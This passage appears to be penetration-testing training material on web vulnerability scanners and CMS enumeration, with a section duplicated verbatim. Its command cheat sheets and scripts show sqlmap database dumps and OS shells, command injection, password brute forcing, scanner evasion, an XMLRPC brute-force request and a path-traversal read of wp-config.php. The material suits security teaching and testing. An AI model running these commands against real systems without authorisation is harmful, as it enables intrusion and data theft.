#!/bin/bash # nuclei_strategy.sh TARGET_LIST=$1 OUTDIR="scans/nuclei_$(date +%Y%m%d)" mkdir -p $OUTDIR echo "=== Nuclei Scanning Strategy ===" # Phase 1: Technology detection echo "[1/5] Technology detection..." nuclei -l $TARGET_LIST -t technologies/ -silent -o $OUTDIR/tech.txt # Phase 2: Critical CVEs echo "[2/5] Critical CVE scan..." nuclei -l $TARGET_LIST -t cves/ -severity critical -silent -o $OUTDIR/critical_cves.txt # Phase 3: Misconfigurations echo "[3/5] Misconfiguration scan..." nuclei -l $TARGET_LIST -t misconfiguration/ -t exposures/ -silent -o $OUTDIR/misconfig.txt # Phase 4: Default logins echo "[4/5] Default credential check..." nuclei -l $TARGET_LIST -t default-logins/ -silent -o $OUTDIR/default_logins.txt # Phase 5: Full vulnerability scan echo "[5/5] Full vulnerability scan..." nuclei -l $TARGET_LIST -t cves/ -t vulnerabilities/ -severity critical,high,medium \ -silent -o $OUTDIR/all_vulns.txt # Summary echo "=== Results Summary ===" echo "Technologies: $(wc -l < $OUTDIR/tech.txt 2>/dev/null || echo 0)" echo "Critical CVEs: $(wc -l < $OUTDIR/critical_cves.txt 2>/dev/null || echo 0)" echo "Misconfigurations: $(wc -l < $OUTDIR/misconfig.txt 2>/dev/null || echo 0)" echo "Default Logins: $(wc -l < $OUTDIR/default_logins.txt 2>/dev/null || echo 0)" echo "All Vulnerabilities: $(wc -l < $OUTDIR/all_vulns.txt 2>/dev/null || echo 0)" echo "Results in: $OUTDIR/"
Task 8
Nikto and Web Vulnerability Scanners
1. Nikto - Web Server Scanner
# Basic scan nikto -h https://target.com # Scan specific port nikto -h target.com -p 8080 nikto -h target.com -p 80,443,8080,8443 # With SSL nikto -h https://target.com -ssl # Through proxy nikto -h https://target.com -useproxy http://127.0.0.1:8080 # Specific tuning options nikto -h https://target.com -Tuning 123456789abcde # Tuning options: # 0 - File upload # 1 - Interesting File / Seen in logs # 2 - Misconfiguration / Default File # 3 - Information Disclosure # 4 - Injection (XSS/Script/HTML) # 5 - Remote File Retrieval - Inside Web Root # 6 - Denial of Service # 7 - Remote File Retrieval - Server Wide # 8 - Command Execution / Remote Shell # 9 - SQL Injection # a - Authentication Bypass # b - Software Identification # c - Remote Source Inclusion # d - WebService # e - Administrative Console # Output formats nikto -h https://target.com -o nikto_results.html -Format html nikto -h https://target.com -o nikto_results.xml -Format xml nikto -h https://target.com -o nikto_results.csv -Format csv nikto -h https://target.com -o nikto_results.txt -Format txt # Scan with authentication nikto -h https://target.com -id admin:password nikto -h https://target.com -id admin:password -authtype Basic # Custom user agent nikto -h https://target.com -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" # Specify root directory nikto -h https://target.com -root /app # Multiple targets nikto -h targets.txt # Evasion techniques nikto -h https://target.com -evasion 1234567 # 1 - Random URI encoding # 2 - Directory self-reference (/./) # 3 - Premature URL ending # 4 - Prepend long random string # 5 - Fake parameter # 6 - TAB as request spacer # 7 - Change the case of the URL # 8 - Use Windows directory separator (\)
2. OWASP ZAP - Automated Scanner
# ZAP command line scan zap-cli quick-scan -s xss,sqli https://target.com zap-cli active-scan https://target.com zap-cli spider https://target.com # ZAP Docker docker run -t ghcr.io/zaproxy/zaproxy zap-baseline.py -t https://target.com docker run -t ghcr.io/zaproxy/zaproxy zap-full-scan.py -t https://target.com docker run -t ghcr.io/zaproxy/zaproxy zap-api-scan.py -t https://target.com/openapi.json # ZAP API # Start ZAP daemon zap.sh -daemon -host 0.0.0.0 -port 8080 -config api.key=YOUR_API_KEY # Spider via API curl "http://localhost:8080/JSON/spider/action/scan/?url=https://target.com&apikey=KEY" # Active scan via API curl "http://localhost:8080/JSON/ascan/action/scan/?url=https://target.com&apikey=KEY" # Get alerts curl "http://localhost:8080/JSON/core/view/alerts/?apikey=KEY" # Generate report curl "http://localhost:8080/OTHER/core/other/htmlreport/?apikey=KEY" > report.html # ZAP Automation Framework # automation.yaml
# ZAP Automation Framework config env: contexts: - name: "Target" urls: - "https://target.com" includePaths: - "https://target.com.*" parameters: failOnError: true failOnWarning: false progressToStdout: true jobs: - type: spider parameters: context: "Target" maxDuration: 5 - type: spiderAjax parameters: context: "Target" maxDuration: 5 - type: passiveScan-wait parameters: maxDuration: 10 - type: activeScan parameters: context: "Target" maxRuleDuration: 5 - type: report parameters: template: "traditional-html" reportDir: "/tmp/" reportFile: "zap-report"
3. Burp Suite Scanner
# Burp Suite Professional Active Scanner # Quick scan: # Dashboard → New scan → Crawl and audit → Enter URL → OK # Custom scan configuration: # Scan type: # - Crawl and audit (full scan) # - Crawl only (discovery) # - Audit selected items (targeted) # Scan configuration: # Audit optimization: # - Scan speed: Fast/Normal/Thorough # - Audit accuracy: Minimize false negatives/positives # - Skip checks: DOS, time-consuming # Issue types to scan for: # - SQL injection # - XSS (reflected, stored, DOM) # - OS command injection # - Path traversal # - File upload # - XXE injection # - SSRF # - Deserialization # - Header injection # - Open redirect # Scan specific requests: # Proxy → HTTP History → Right-click → Scan # Or select specific insertion points # Scheduled scans: # Dashboard → New scan → Schedule tab
4. WPScan - WordPress Scanner
# Basic WordPress scan wpscan --url https://target.com # Enumerate plugins, themes, users wpscan --url https://target.com -e ap,at,u # ap - all plugins # vp - vulnerable plugins # p - popular plugins # at - all themes # vt - vulnerable themes # t - popular themes # u - users (1-10) # dbe - database exports # With API token (vulnerability data) wpscan --url https://target.com --api-token YOUR_TOKEN -e vp,vt # Aggressive plugin detection wpscan --url https://target.com --plugins-detection aggressive # Password brute force wpscan --url https://target.com -U users.txt -P passwords.txt # Specific checks wpscan --url https://target.com --enumerate u --force wpscan --url https://target.com --enumerate p --plugins-version-detection aggressive # Through proxy wpscan --url https://target.com --proxy http://127.0.0.1:8080 # Output wpscan --url https://target.com -o wpscan_results.json -f json wpscan --url https://target.com -o wpscan_results.cli -f cli # Stealthy scan wpscan --url https://target.com --random-user-agent --throttle 500
5. SQLMap - SQL Injection Scanner
# Basic scan sqlmap -u "https://target.com/page?id=1" # With POST data sqlmap -u "https://target.com/login" --data="username=admin&password=test" # From Burp request file sqlmap -r burp_request.txt # Specify database type sqlmap -u "https://target.com/page?id=1" --dbms=mysql # Enumerate databases sqlmap -u "https://target.com/page?id=1" --dbs # Enumerate tables sqlmap -u "https://target.com/page?id=1" -D database_name --tables # Dump data sqlmap -u "https://target.com/page?id=1" -D database_name -T users --dump # All techniques sqlmap -u "https://target.com/page?id=1" --technique=BEUSTQ # B - Boolean blind # E - Error-based # U - Union-based # S - Stacked queries # T - Time-based blind # Q - Inline queries # Risk and level sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 # Through proxy sqlmap -u "https://target.com/page?id=1" --proxy=http://127.0.0.1:8080 # With cookies sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" # Tamper scripts (WAF bypass) sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between # OS shell sqlmap -u "https://target.com/page?id=1" --os-shell # Batch mode (non-interactive) sqlmap -u "https://target.com/page?id=1" --batch
6. Commix - Command Injection Scanner
# Basic scan commix -u "https://target.com/page?cmd=test" # POST data commix -u "https://target.com/execute" --data="command=ls" # From file commix -r request.txt # Through proxy commix -u "https://target.com/page?cmd=test" --proxy=http://127.0.0.1:8080 # Get interactive shell commix -u "https://target.com/page?cmd=test" --os-cmd="id" # Specific technique commix -u "https://target.com/page?cmd=test" --technique=classic # classic, eval-based, time-based, file-based
7. Specialized Scanners
# testssl.sh - SSL/TLS testing testssl.sh https://target.com testssl.sh --vulnerable https://target.com # SSLyze sslyze target.com # CMS scanners droopescan scan drupal -u https://target.com # Drupal joomscan -u https://target.com # Joomla magescan scan:all https://target.com # Magento # API scanners # Astra - API security testing # Postman + Newman for API test automation # Cloud scanners # ScoutSuite - multi-cloud security auditing # Prowler - AWS security # az-security-scan - Azure security
8. Scanner Result Interpretation
# Understanding scanner output severity: # CRITICAL: # - Remote Code Execution (RCE) # - SQL Injection with data access # - Authentication bypass # - Deserialization RCE # Action: Exploit and report immediately # HIGH: # - Stored XSS # - SSRF to internal services # - Local File Inclusion (LFI) # - Privilege escalation # Action: Verify manually and exploit # MEDIUM: # - Reflected XSS # - CSRF # - Information disclosure # - Missing security headers # Action: Verify and document # LOW: # - Cookie without Secure flag # - Missing HSTS # - Server version disclosure # - Directory listing # Action: Document in report # INFO: # - Technology detection # - Open ports # - SSL certificate info # Action: Use for attack surface understanding # False positive indicators: # - Generic error pages matching patterns # - WAF blocking causing detection # - Scanner misinterpreting normal behavior # - Time-based tests affected by network latency # ALWAYS verify scanner findings manually!
9. Scanner Comparison
| Feature | Nuclei | Nikto | ZAP | Burp Pro | |----------------------|---------|---------|---------|----------| | Speed | Fast | Medium | Slow | Medium | | False positives | Low | Medium | Medium | Low | | Customization | High | Low | Medium | High | | Active scanning | Yes | Yes | Yes | Yes | | Authenticated scan | Yes | Basic | Yes | Yes | | API scanning | Limited | No | Yes | Yes | | CI/CD integration | Easy | Easy | Easy | Possible | | Reporting | Basic | Basic | Good | Excellent| | JavaScript analysis | Limited | No | Yes | Yes | | Custom templates | YAML | No | Scripts | Extensions| | Price | Free | Free | Free | Paid | # Recommended workflow: # 1. Nuclei for fast, broad scanning # 2. Nikto for server misconfiguration # 3. ZAP/Burp for deep application scanning # 4. Specialized tools for specific vulns (sqlmap, commix, etc.)
10. Scanner Automation Pipeline
#!/bin/bash # scan_pipeline.sh TARGET=$1 OUTDIR="scans/${TARGET}_$(date +%Y%m%d)" mkdir -p $OUTDIR echo "=== Vulnerability Scanning Pipeline: $TARGET ===" # Phase 1: Nuclei (fast, broad) echo "[1/4] Running Nuclei..." nuclei -u "https://$TARGET" -severity critical,high,medium \ -silent -o $OUTDIR/nuclei.txt 2>/dev/null echo "[*] Nuclei findings: $(wc -l < $OUTDIR/nuclei.txt 2>/dev/null || echo 0)" # Phase 2: Nikto (server-focused) echo "[2/4] Running Nikto..." nikto -h "https://$TARGET" -o $OUTDIR/nikto.html -Format html 2>/dev/null echo "[*] Nikto complete" # Phase 3: SSL/TLS check echo "[3/4] SSL/TLS analysis..." testssl.sh "https://$TARGET" > $OUTDIR/ssl_test.txt 2>/dev/null echo "[*] SSL analysis complete" # Phase 4: Header analysis echo "[4/4] Security headers..." curl -sI "https://$TARGET" > $OUTDIR/headers.txt echo "=== Scan Complete ===" echo "Results in: $OUTDIR/" ls -la $OUTDIR/
Task 9
Nikto and Web Vulnerability Scanners
1. Nikto - Web Server Scanner
# Basic scan nikto -h https://target.com # Scan specific port nikto -h target.com -p 8080 nikto -h target.com -p 80,443,8080,8443 # With SSL nikto -h https://target.com -ssl # Through proxy nikto -h https://target.com -useproxy http://127.0.0.1:8080 # Specific tuning options nikto -h https://target.com -Tuning 123456789abcde # Tuning options: # 0 - File upload # 1 - Interesting File / Seen in logs # 2 - Misconfiguration / Default File # 3 - Information Disclosure # 4 - Injection (XSS/Script/HTML) # 5 - Remote File Retrieval - Inside Web Root # 6 - Denial of Service # 7 - Remote File Retrieval - Server Wide # 8 - Command Execution / Remote Shell # 9 - SQL Injection # a - Authentication Bypass # b - Software Identification # c - Remote Source Inclusion # d - WebService # e - Administrative Console # Output formats nikto -h https://target.com -o nikto_results.html -Format html nikto -h https://target.com -o nikto_results.xml -Format xml nikto -h https://target.com -o nikto_results.csv -Format csv nikto -h https://target.com -o nikto_results.txt -Format txt # Scan with authentication nikto -h https://target.com -id admin:password nikto -h https://target.com -id admin:password -authtype Basic # Custom user agent nikto -h https://target.com -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" # Specify root directory nikto -h https://target.com -root /app # Multiple targets nikto -h targets.txt # Evasion techniques nikto -h https://target.com -evasion 1234567 # 1 - Random URI encoding # 2 - Directory self-reference (/./) # 3 - Premature URL ending # 4 - Prepend long random string # 5 - Fake parameter # 6 - TAB as request spacer # 7 - Change the case of the URL # 8 - Use Windows directory separator (\)
2. OWASP ZAP - Automated Scanner
# ZAP command line scan zap-cli quick-scan -s xss,sqli https://target.com zap-cli active-scan https://target.com zap-cli spider https://target.com # ZAP Docker docker run -t ghcr.io/zaproxy/zaproxy zap-baseline.py -t https://target.com docker run -t ghcr.io/zaproxy/zaproxy zap-full-scan.py -t https://target.com docker run -t ghcr.io/zaproxy/zaproxy zap-api-scan.py -t https://target.com/openapi.json # ZAP API # Start ZAP daemon zap.sh -daemon -host 0.0.0.0 -port 8080 -config api.key=YOUR_API_KEY # Spider via API curl "http://localhost:8080/JSON/spider/action/scan/?url=https://target.com&apikey=KEY" # Active scan via API curl "http://localhost:8080/JSON/ascan/action/scan/?url=https://target.com&apikey=KEY" # Get alerts curl "http://localhost:8080/JSON/core/view/alerts/?apikey=KEY" # Generate report curl "http://localhost:8080/OTHER/core/other/htmlreport/?apikey=KEY" > report.html # ZAP Automation Framework # automation.yaml
# ZAP Automation Framework config env: contexts: - name: "Target" urls: - "https://target.com" includePaths: - "https://target.com.*" parameters: failOnError: true failOnWarning: false progressToStdout: true jobs: - type: spider parameters: context: "Target" maxDuration: 5 - type: spiderAjax parameters: context: "Target" maxDuration: 5 - type: passiveScan-wait parameters: maxDuration: 10 - type: activeScan parameters: context: "Target" maxRuleDuration: 5 - type: report parameters: template: "traditional-html" reportDir: "/tmp/" reportFile: "zap-report"
3. Burp Suite Scanner
# Burp Suite Professional Active Scanner # Quick scan: # Dashboard → New scan → Crawl and audit → Enter URL → OK # Custom scan configuration: # Scan type: # - Crawl and audit (full scan) # - Crawl only (discovery) # - Audit selected items (targeted) # Scan configuration: # Audit optimization: # - Scan speed: Fast/Normal/Thorough # - Audit accuracy: Minimize false negatives/positives # - Skip checks: DOS, time-consuming # Issue types to scan for: # - SQL injection # - XSS (reflected, stored, DOM) # - OS command injection # - Path traversal # - File upload # - XXE injection # - SSRF # - Deserialization # - Header injection # - Open redirect # Scan specific requests: # Proxy → HTTP History → Right-click → Scan # Or select specific insertion points # Scheduled scans: # Dashboard → New scan → Schedule tab
4. WPScan - WordPress Scanner
# Basic WordPress scan wpscan --url https://target.com # Enumerate plugins, themes, users wpscan --url https://target.com -e ap,at,u # ap - all plugins # vp - vulnerable plugins # p - popular plugins # at - all themes # vt - vulnerable themes # t - popular themes # u - users (1-10) # dbe - database exports # With API token (vulnerability data) wpscan --url https://target.com --api-token YOUR_TOKEN -e vp,vt # Aggressive plugin detection wpscan --url https://target.com --plugins-detection aggressive # Password brute force wpscan --url https://target.com -U users.txt -P passwords.txt # Specific checks wpscan --url https://target.com --enumerate u --force wpscan --url https://target.com --enumerate p --plugins-version-detection aggressive # Through proxy wpscan --url https://target.com --proxy http://127.0.0.1:8080 # Output wpscan --url https://target.com -o wpscan_results.json -f json wpscan --url https://target.com -o wpscan_results.cli -f cli # Stealthy scan wpscan --url https://target.com --random-user-agent --throttle 500
5. SQLMap - SQL Injection Scanner
# Basic scan sqlmap -u "https://target.com/page?id=1" # With POST data sqlmap -u "https://target.com/login" --data="username=admin&password=test" # From Burp request file sqlmap -r burp_request.txt # Specify database type sqlmap -u "https://target.com/page?id=1" --dbms=mysql # Enumerate databases sqlmap -u "https://target.com/page?id=1" --dbs # Enumerate tables sqlmap -u "https://target.com/page?id=1" -D database_name --tables # Dump data sqlmap -u "https://target.com/page?id=1" -D database_name -T users --dump # All techniques sqlmap -u "https://target.com/page?id=1" --technique=BEUSTQ # B - Boolean blind # E - Error-based # U - Union-based # S - Stacked queries # T - Time-based blind # Q - Inline queries # Risk and level sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 # Through proxy sqlmap -u "https://target.com/page?id=1" --proxy=http://127.0.0.1:8080 # With cookies sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" # Tamper scripts (WAF bypass) sqlmap -u "https://target.com/page?id=1" --tamper=space2comment,between # OS shell sqlmap -u "https://target.com/page?id=1" --os-shell # Batch mode (non-interactive) sqlmap -u "https://target.com/page?id=1" --batch
6. Commix - Command Injection Scanner
# Basic scan commix -u "https://target.com/page?cmd=test" # POST data commix -u "https://target.com/execute" --data="command=ls" # From file commix -r request.txt # Through proxy commix -u "https://target.com/page?cmd=test" --proxy=http://127.0.0.1:8080 # Get interactive shell commix -u "https://target.com/page?cmd=test" --os-cmd="id" # Specific technique commix -u "https://target.com/page?cmd=test" --technique=classic # classic, eval-based, time-based, file-based
7. Specialized Scanners
# testssl.sh - SSL/TLS testing testssl.sh https://target.com testssl.sh --vulnerable https://target.com # SSLyze sslyze target.com # CMS scanners droopescan scan drupal -u https://target.com # Drupal joomscan -u https://target.com # Joomla magescan scan:all https://target.com # Magento # API scanners # Astra - API security testing # Postman + Newman for API test automation # Cloud scanners # ScoutSuite - multi-cloud security auditing # Prowler - AWS security # az-security-scan - Azure security
8. Scanner Result Interpretation
# Understanding scanner output severity: # CRITICAL: # - Remote Code Execution (RCE) # - SQL Injection with data access # - Authentication bypass # - Deserialization RCE # Action: Exploit and report immediately # HIGH: # - Stored XSS # - SSRF to internal services # - Local File Inclusion (LFI) # - Privilege escalation # Action: Verify manually and exploit # MEDIUM: # - Reflected XSS # - CSRF # - Information disclosure # - Missing security headers # Action: Verify and document # LOW: # - Cookie without Secure flag # - Missing HSTS # - Server version disclosure # - Directory listing # Action: Document in report # INFO: # - Technology detection # - Open ports # - SSL certificate info # Action: Use for attack surface understanding # False positive indicators: # - Generic error pages matching patterns # - WAF blocking causing detection # - Scanner misinterpreting normal behavior # - Time-based tests affected by network latency # ALWAYS verify scanner findings manually!
9. Scanner Comparison
| Feature | Nuclei | Nikto | ZAP | Burp Pro | |----------------------|---------|---------|---------|----------| | Speed | Fast | Medium | Slow | Medium | | False positives | Low | Medium | Medium | Low | | Customization | High | Low | Medium | High | | Active scanning | Yes | Yes | Yes | Yes | | Authenticated scan | Yes | Basic | Yes | Yes | | API scanning | Limited | No | Yes | Yes | | CI/CD integration | Easy | Easy | Easy | Possible | | Reporting | Basic | Basic | Good | Excellent| | JavaScript analysis | Limited | No | Yes | Yes | | Custom templates | YAML | No | Scripts | Extensions| | Price | Free | Free | Free | Paid | # Recommended workflow: # 1. Nuclei for fast, broad scanning # 2. Nikto for server misconfiguration # 3. ZAP/Burp for deep application scanning # 4. Specialized tools for specific vulns (sqlmap, commix, etc.)
10. Scanner Automation Pipeline
#!/bin/bash # scan_pipeline.sh TARGET=$1 OUTDIR="scans/${TARGET}_$(date +%Y%m%d)" mkdir -p $OUTDIR echo "=== Vulnerability Scanning Pipeline: $TARGET ===" # Phase 1: Nuclei (fast, broad) echo "[1/4] Running Nuclei..." nuclei -u "https://$TARGET" -severity critical,high,medium \ -silent -o $OUTDIR/nuclei.txt 2>/dev/null echo "[*] Nuclei findings: $(wc -l < $OUTDIR/nuclei.txt 2>/dev/null || echo 0)" # Phase 2: Nikto (server-focused) echo "[2/4] Running Nikto..." nikto -h "https://$TARGET" -o $OUTDIR/nikto.html -Format html 2>/dev/null echo "[*] Nikto complete" # Phase 3: SSL/TLS check echo "[3/4] SSL/TLS analysis..." testssl.sh "https://$TARGET" > $OUTDIR/ssl_test.txt 2>/dev/null echo "[*] SSL analysis complete" # Phase 4: Header analysis echo "[4/4] Security headers..." curl -sI "https://$TARGET" > $OUTDIR/headers.txt echo "=== Scan Complete ===" echo "Results in: $OUTDIR/" ls -la $OUTDIR/
Task 10
CMS Enumeration
1. CMS Detection
# Automated CMS detection whatweb -a 3 https://target.com # Manual detection indicators: # WordPress curl -s https://target.com | grep -i "wp-content\|wp-includes\|wordpress" curl -s https://target.com/wp-login.php -o /dev/null -w "%{http_code}" curl -s https://target.com/wp-json/wp/v2/ | head curl -s https://target.com/xmlrpc.php -o /dev/null -w "%{http_code}" curl -s https://target.com/readme.html | grep -i version # Drupal curl -s https://target.com | grep -i "drupal\|sites/default" curl -s https://target.com/CHANGELOG.txt | head -5 curl -s https://target.com/core/CHANGELOG.txt | head -5 curl -s https://target.com/user/login -o /dev/null -w "%{http_code}" # Joomla curl -s https://target.com | grep -i "joomla\|/components/\|/modules/" curl -s https://target.com/administrator/ -o /dev/null -w "%{http_code}" curl -s https://target.com/administrator/manifests/files/joomla.xml | grep version # Magento curl -s https://target.com | grep -i "magento\|mage\|varien" curl -s https://target.com/magento_version -o /dev/null -w "%{http_code}" curl -s https://target.com/downloader/ -o /dev/null -w "%{http_code}" # SharePoint curl -s https://target.com/_layouts/ -o /dev/null -w "%{http_code}" curl -s https://target.com/_vti_bin/ -o /dev/null -w "%{http_code}" curl -s https://target.com/_api/web 2>/dev/null | head
2. WordPress Enumeration
# WPScan comprehensive scan wpscan --url https://target.com -e ap,at,u,dbe --api-token $WPSCAN_TOKEN # Version detection curl -s https://target.com | grep -oP 'content="WordPress (\d+\.\d+\.?\d*)"' curl -s https://target.com/readme.html | grep -i version curl -s https://target.com/wp-links-opml.php | grep -i generator curl -s https://target.com/feed/ | grep -i generator # User enumeration wpscan --url https://target.com -e u # Manual: curl -s "https://target.com/?author=1" -L | grep -oP 'author/\K[^/]+' curl -s "https://target.com/wp-json/wp/v2/users" | jq '.[].slug' for i in $(seq 1 20); do user=$(curl -s "https://target.com/?author=$i" -L -o /dev/null -w "%{url_effective}" | grep -oP 'author/\K[^/]+') [ -n "$user" ] && echo "[+] User $i: $user" done # Plugin enumeration wpscan --url https://target.com -e ap --plugins-detection aggressive # Manual: curl -s https://target.com | grep -oP '/wp-content/plugins/\K[^/]+' | sort -u curl -s https://target.com/wp-content/plugins/ 2>/dev/null # Directory listing # Theme enumeration wpscan --url https://target.com -e at curl -s https://target.com | grep -oP '/wp-content/themes/\K[^/]+' | sort -u # WordPress API endpoints curl -s https://target.com/wp-json/ | jq '.routes | keys[]' curl -s https://target.com/wp-json/wp/v2/posts | jq '.[].title.rendered' curl -s https://target.com/wp-json/wp/v2/pages | jq '.[].title.rendered' curl -s https://target.com/wp-json/wp/v2/users | jq '.[].name' curl -s https://target.com/wp-json/wp/v2/media | jq '.[].source_url' curl -s https://target.com/wp-json/wp/v2/categories | jq '.[].name' # XMLRPC methods curl -s -X POST https://target.com/xmlrpc.php \ -H "Content-Type: text/xml" \ -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' # Check for debug.log curl -s https://target.com/wp-content/debug.log | head # Common vulnerable paths curl -s https://target.com/wp-config.php~ -o /dev/null -w "%{http_code}" curl -s https://target.com/wp-config.php.bak -o /dev/null -w "%{http_code}" curl -s https://target.com/.wp-config.php.swp -o /dev/null -w "%{http_code}"
3. Drupal Enumeration
# Droopescan droopescan scan drupal -u https://target.com # Version detection curl -s https://target.com/CHANGELOG.txt | head -5 curl -s https://target.com/core/CHANGELOG.txt | head -5 curl -s https://target.com/core/install.php 2>/dev/null | head curl -s https://target.com | grep -oP 'Drupal [\d.]+' # Module enumeration # Common modules to check: DRUPAL_MODULES="views ctools token pathauto entity libraries admin_menu date features field_group ckeditor webform metatag redirect rules block panels google_analytics jquery_update backup_migrate" for mod in $DRUPAL_MODULES; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/modules/$mod/" 2>/dev/null) code2=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/modules/contrib/$mod/" 2>/dev/null) if [ "$code" = "200" ] || [ "$code" = "403" ] || [ "$code2" = "200" ] || [ "$code2" = "403" ]; then echo "[+] Module found: $mod" fi done # User enumeration curl -s "https://target.com/user/1" -L -o /dev/null -w "%{http_code}" for i in $(seq 0 20); do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/user/$i" 2>/dev/null) if [ "$code" = "200" ]; then echo "[+] User $i exists" fi done # Drupal specific vulnerabilities # Drupalgeddon (CVE-2014-3704) - SQL injection # Drupalgeddon2 (CVE-2018-7600) - RCE # Drupalgeddon3 (CVE-2018-7602) - RCE nuclei -u https://target.com -t cves/drupal/
4. Joomla Enumeration
# JoomScan joomscan -u https://target.com # Version detection curl -s https://target.com/administrator/manifests/files/joomla.xml | grep '<version>' curl -s https://target.com/language/en-GB/en-GB.xml | grep '<version>' curl -s https://target.com | grep -oP 'Joomla!?\s*[\d.]+' # Component enumeration JOOMLA_COMPS="com_content com_users com_contact com_search com_finder com_newsfeeds com_tags com_fields com_redirect com_config com_media com_modules com_plugins com_templates com_categories com_banners com_wrapper com_weblinks" for comp in $JOOMLA_COMPS; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/components/$comp/" 2>/dev/null) if [ "$code" != "404" ]; then echo "[+] Component: $comp → $code" fi done # Admin panel curl -s https://target.com/administrator/ # Configuration files curl -s https://target.com/configuration.php~ -o /dev/null -w "%{http_code}" curl -s https://target.com/configuration.php.bak -o /dev/null -w "%{http_code}"
5. Plugin Vulnerability Research
# WordPress plugin vulnerabilities # WPVulnDB (wpscan.com/api) wpscan --url https://target.com -e vp --api-token $WPSCAN_TOKEN # searchsploit for known exploits searchsploit wordpress plugin_name searchsploit drupal module_name searchsploit joomla component_name # CVE databases # NVD: https://nvd.nist.gov # WPScan DB: https://wpscan.com/plugins # Patchstack: https://patchstack.com/database # Nuclei CMS templates nuclei -u https://target.com -t cves/wordpress/ nuclei -u https://target.com -t cves/drupal/ nuclei -u https://target.com -t cves/joomla/ # Manual vulnerability checks # Check plugin version curl -s https://target.com/wp-content/plugins/PLUGIN/readme.txt | grep "Stable tag" # Compare with known vulnerable versions # Common high-value WordPress plugin vulnerabilities: # Contact Form 7 - File upload bypass # Elementor - RCE, XSS # WooCommerce - SQLi, auth bypass # Yoast SEO - SQLi # All In One SEO - SQLi, privilege escalation # WPForms - SQLi # Wordfence - auth bypass (ironic) # UpdraftPlus - backup download without auth # Advanced Custom Fields - XSS # Gravity Forms - file upload, injection
6. Theme Analysis
# WordPress theme analysis # Identify active theme curl -s https://target.com | grep -oP 'wp-content/themes/\K[^/]+' | head -1 # Check theme version curl -s "https://target.com/wp-content/themes/THEME/style.css" | head -20 | grep -i version # Look for theme editor access curl -s "https://target.com/wp-admin/theme-editor.php" -o /dev/null -w "%{http_code}" # Child theme detection curl -s https://target.com | grep -oP 'wp-content/themes/\K[^/]+' | sort -u # Known vulnerable themes searchsploit wordpress theme THEME_NAME nuclei -u https://target.com -tags wordpress-themes # Theme file inclusion vulnerabilities # Many themes include files based on user input # /wp-content/themes/theme/download.php?file=../../../wp-config.php
7. CMS Configuration Analysis
# WordPress configuration exposure # wp-config.php backup files for ext in bak old orig save swp swo txt ~ .bak .old .save .orig .tmp; do code=$(curl -s -o /dev/null -w "%{http_code}" "https://target.com/wp-config.php${ext}" 2>/dev/null) if [ "$code" = "200" ]; then echo "[CRITICAL] wp-config.php${ext} is accessible!" fi done # WordPress debug log curl -s https://target.com/wp-content/debug.log 2>/dev/null | head -20 # WordPress uploads directory listing curl -s https://target.com/wp-content/uploads/ -o /dev/null -w "%{http_code}" curl -s https://target.com/wp-content/uploads/2024/ -o /dev/null -w "%{http_code}" # Common CMS misconfigurations: # 1. Directory listing enabled in /wp-content/uploads/ # 2. Debug mode enabled in production # 3. Default admin credentials # 4. Exposed configuration backups # 5. XMLRPC enabled (brute force, DDoS amplification) # 6. User registration open when shouldn't be # 7. File editing enabled in admin # 8. Weak admin password # 9. Outdated core/plugins/themes # 10. Exposed admin panel without 2FA
8. CMS-Specific Attack Vectors
# WordPress attacks: # 1. XMLRPC brute force curl -s -X POST https://target.com/xmlrpc.php \ -H "Content-Type: text/xml" \ -d '<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>password123</value></param></params></methodCall>' # 2. XMLRPC multicall (amplified brute force) # Send multiple login attempts in single request # 3. REST API user enumeration curl -s https://target.com/wp-json/wp/v2/users # 4. WordPress arbitrary file deletion (CVE-2018-12895) # 5. WordPress RCE via plugin/theme editor # 6. WordPress XXE via Media Upload # Drupal attacks: # 1. Drupalgeddon2 (CVE-2018-7600) # 2. Registration form manipulation # 3. Admin panel brute force # 4. Module-specific vulnerabilities # Joomla attacks: # 1. Component injection (com_*) # 2. Admin panel brute force # 3. Configuration file exposure # 4. Registration exploitation
9. CMS Hardening Check
# WordPress hardening checklist: [ ] WordPress core updated to latest [ ] All plugins updated [ ] All themes updated [ ] Unused plugins/themes removed [ ] XMLRPC disabled [ ] File editing disabled (DISALLOW_FILE_EDIT) [ ] Debug mode off in production [ ] Strong admin password [ ] Admin username not "admin" [ ] User enumeration blocked [ ] wp-config.php protected [ ] uploads directory secured [ ] Security headers configured [ ] Two-factor authentication enabled [ ] Login rate limiting active [ ] Regular backups configured [ ] File integrity monitoring [ ] WAF/security plugin installed
10. CMS Enumeration Script
#!/bin/bash # cms_enum.sh TARGET=$1 OUTDIR="recon/${TARGET}/cms" mkdir -p $OUTDIR echo "=== CMS Enumeration: $TARGET ===" # Detect CMS echo "[1/4] Detecting CMS..." whatweb -a 3 "https://$TARGET" > $OUTDIR/whatweb.txt 2>/dev/null # Check each CMS WP=$(curl -s "https://$TARGET/wp-login.php" -o /dev/null -w "%{http_code}" 2>/dev/null) DRUPAL=$(curl -s "https://$TARGET/user/login" -o /dev/null -w "%{http_code}" 2>/dev/null) JOOMLA=$(curl -s "https://$TARGET/administrator/" -o /dev/null -w "%{http_code}" 2>/dev/null) # WordPress scan if [ "$WP" = "200" ] || grep -qi "wordpress" $OUTDIR/whatweb.txt 2>/dev/null; then echo "[+] WordPress detected!" echo "[2/4] Running WPScan..." wpscan --url "https://$TARGET" -e ap,at,u --no-banner -o $OUTDIR/wpscan.txt 2>/dev/null # Additional checks curl -s "https://$TARGET/wp-json/wp/v2/users" | jq '.[].slug' > $OUTDIR/wp_users.txt 2>/dev/null curl -s "https://$TARGET/wp-content/debug.log" > $OUTDIR/debug_log.txt 2>/dev/null fi # Drupal scan if [ "$DRUPAL" = "200" ] || grep -qi "drupal" $OUTDIR/whatweb.txt 2>/dev/null; then echo 